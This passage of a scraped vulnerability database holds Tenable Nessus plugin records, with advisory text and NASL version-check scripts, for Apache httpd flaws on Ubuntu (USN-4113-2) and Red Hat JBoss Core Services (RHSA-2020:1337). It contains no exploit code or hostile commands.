get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"apache2\", pkgver:\"2.4.18-2ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu3.12\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"apache2\", pkgver:\"2.4.29-1ubuntu4.10\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.29-1ubuntu4.10\")) flag++;\nif (ubuntu_check(osver:\"19.04\", pkgname:\"apache2\", pkgver:\"2.4.38-2ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"19.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.38-2ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-bin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T16:39:34", "description": "USN-4113-1 fixed vulnerabilities in the Apache HTTP server.\nUnfortunately, that update introduced a regression when proxying balancer manager connections in some configurations. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nStefan Eissing discovered that the HTTP/2 implementation in Apache did not properly handle upgrade requests from HTTP/1.1 to HTTP/2 in some situations. A remote attacker could use this to cause a denial of service (daemon crash). This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-0197)\n\nCraig Young discovered that a memory overwrite error existed in Apache when performing HTTP/2 very early pushes in some situations. A remote attacker could use this to cause a denial of service (daemon crash).\nThis issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04.\n(CVE-2019-10081)\n\nCraig Young discovered that a read-after-free error existed in the HTTP/2 implementation in Apache during connection shutdown. A remote attacker could use this to possibly cause a denial of service (daemon crash) or possibly expose sensitive information. This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-10082)\n\nMatei Badanoiu discovered that the mod_proxy component of Apache did not properly filter URLs when reporting errors in some configurations.\nA remote attacker could possibly use this issue to conduct cross-site scripting (XSS) attacks. (CVE-2019-10092)\n\nDaniel McCarney discovered that mod_remoteip component of Apache contained a stack buffer overflow when parsing headers from a trusted intermediary proxy in some situations. A remote attacker controlling a trusted proxy could use this to cause a denial of service or possibly execute arbitrary code. This issue only affected Ubuntu 19.04.\n(CVE-2019-10097)\n\nYukitsugu Sasaki discovered that the mod_rewrite component in Apache was vulnerable to open redirects in some situations. A remote attacker could use this to possibly expose sensitive information or bypass intended restrictions. (CVE-2019-10098)\n\nJonathan Looney discovered that the HTTP/2 implementation in Apache did not properly limit the amount of buffering for client connections in some situations. A remote attacker could use this to cause a denial of service (unresponsive daemon). This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-9517).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-09-18T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 19.04 : Apache HTTP Server regression (USN-4113-2) (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0197", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2023-05-11T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2", "p-cpe:/a:canonical:ubuntu_linux:apache2-bin", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:19.04"], "id": "UBUNTU_USN-4113-2.NASL", "href": "https://www.tenable.com/plugins/nessus/128993", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4113-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128993);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/11\");\n\n script_cve_id(\"CVE-2019-0197\", \"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_xref(name:\"USN\", value:\"4113-2\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0203\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 19.04 : Apache HTTP Server regression (USN-4113-2) (Internal Data Buffering)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-4113-1 fixed vulnerabilities in the Apache HTTP server.\nUnfortunately, that update introduced a regression when proxying\nbalancer manager connections in some configurations. This update fixes\nthe problem.\n\nWe apologize for the inconvenience.\n\nStefan Eissing discovered that the HTTP/2 implementation in Apache did\nnot properly handle upgrade requests from HTTP/1.1 to HTTP/2 in some\nsituations. A remote attacker could use this to cause a denial of\nservice (daemon crash). This issue only affected Ubuntu 18.04 LTS and\nUbuntu 19.04. (CVE-2019-0197)\n\nCraig Young discovered that a memory overwrite error existed in Apache\nwhen performing HTTP/2 very early pushes in some situations. A remote\nattacker could use this to cause a denial of service (daemon crash).\nThis issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04.\n(CVE-2019-10081)\n\nCraig Young discovered that a read-after-free error existed in the\nHTTP/2 implementation in Apache during connection shutdown. A remote\nattacker could use this to possibly cause a denial of service (daemon\ncrash) or possibly expose sensitive information. This issue only\naffected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-10082)\n\nMatei Badanoiu discovered that the mod_proxy component of Apache did\nnot properly filter URLs when reporting errors in some configurations.\nA remote attacker could possibly use this issue to conduct cross-site\nscripting (XSS) attacks. (CVE-2019-10092)\n\nDaniel McCarney discovered that mod_remoteip component of Apache\ncontained a stack buffer overflow when parsing headers from a trusted\nintermediary proxy in some situations. A remote attacker controlling a\ntrusted proxy could use this to cause a denial of service or possibly\nexecute arbitrary code. This issue only affected Ubuntu 19.04.\n(CVE-2019-10097)\n\nYukitsugu Sasaki discovered that the mod_rewrite component in Apache\nwas vulnerable to open redirects in some situations. A remote attacker\ncould use this to possibly expose sensitive information or bypass\nintended restrictions. (CVE-2019-10098)\n\nJonathan Looney discovered that the HTTP/2 implementation in Apache\ndid not properly limit the amount of buffering for client connections\nin some situations. A remote attacker could use this to cause a denial\nof service (unresponsive daemon). This issue only affected Ubuntu\n18.04 LTS and Ubuntu 19.04. (CVE-2019-9517).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4113-2/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected apache2 and / or apache2-bin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:19.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2023 Canonical, Inc. / NASL script (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|19\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04 / 19.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"apache2\", pkgver:\"2.4.18-2ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"apache2\", pkgver:\"2.4.29-1ubuntu4.11\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.29-1ubuntu4.11\")) flag++;\nif (ubuntu_check(osver:\"19.04\", pkgname:\"apache2\", pkgver:\"2.4.38-2ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"19.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.38-2ubuntu2.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-bin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T15:22:13", "description": "The remote Redhat Enterprise Linux 6 / 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:1337 advisory.\n\n - httpd: memory corruption on early pushes (CVE-2019-10081)\n\n - httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n - httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n - httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n - httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n - openssl: side-channel weak encryption vulnerability (CVE-2019-1547)\n\n - openssl: information disclosure in fork() (CVE-2019-1549)\n\n - openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey (CVE-2019-1563)\n\n - httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-04-06T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP2 (RHSA-2020:1337)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1563", "CVE-2020-1927"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apr", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apr-devel", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-brotli", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-brotli-devel", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-devel", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-manual", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-selinux", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-tools", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_http2", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_ldap", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_proxy_html", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_session", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_ssl", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl", "p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static"], "id": "REDHAT-RHSA-2020-1337.NASL", "href": "https://www.tenable.com/plugins/nessus/135235", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:1337. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135235);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\n \"CVE-2019-1547\",\n \"CVE-2019-1549\",\n \"CVE-2019-1563\",\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10092\",\n \"CVE-2019-10097\",\n \"CVE-2019-10098\"\n );\n script_xref(name:\"RHSA\", value:\"2020:1337\");\n script_xref(name:\"IAVA\", value:\"2020-A-0022\");\n script_xref(name:\"IAVA\", value:\"2020-A-0140\");\n script_xref(name:\"IAVA\", value:\"2019-A-0303-S\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP2 (RHSA-2020:1337)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 / 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:1337 advisory.\n\n - httpd: memory corruption on early pushes (CVE-2019-10081)\n\n - httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n - httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n - httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n - httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n - openssl: side-channel weak encryption vulnerability (CVE-2019-1547)\n\n - openssl: information disclosure in fork() (CVE-2019-1549)\n\n - openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey (CVE-2019-1563)\n\n - httpd: mod_rewrite configurations vulnerable to open redirect (CVE-2020-1927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-1547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-1549\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-1563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10081\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10082\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10092\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10097\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10098\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1927\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:1337\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743956\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743959\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743966\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743974\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1743996\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1752090\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1752095\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1752100\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1820761\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79, 120, 200, 400, 416, 601, 602);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-brotli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-brotli-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_http2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['6','7'])) audit(AUDIT_OS_NOT, 'Red Hat 6.x / 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/server/6/6Server/i386/jbcs/1/debug',\n 'content/dist/rhel/server/6/6Server/i386/jbcs/1/os',\n 'content/dist/rhel/server/6/6Server/i386/jbcs/1/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/jbcs/1/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/jbcs/1/os',\n 'content/dist/rhel/server/6/6Server/x86_64/jbcs/1/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'jbcs-httpd24-apr-1.6.3-86.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-apr-1.6.3-86.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-apr-devel-1.6.3-86.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-apr-devel-1.6.3-86.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-brotli-1.0.6-21.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-brotli-1.0.6-21.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-brotli-devel-1.0.6-21.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-brotli-devel-1.0.6-21.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-2.4.37-52.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-2.4.37-52.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-devel-2.4.37-52.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-devel-2.4.37-52.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-manual-2.4.37-52.jbcs.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-selinux-2.4.37-52.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-selinux-2.4.37-52.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-tools-2.4.37-52.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-httpd-tools-2.4.37-52.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_cluster-native-1.3.12-41.Final_redhat_2.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_cluster-native-1.3.12-41.Final_redhat_2.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_http2-1.11.3-22.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_http2-1.11.3-22.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_ldap-2.4.37-52.jbcs.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'jbcs-httpd24'},\n {'reference':'jbcs-httpd24-mod_ldap-2.4.37-52.jbcs.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 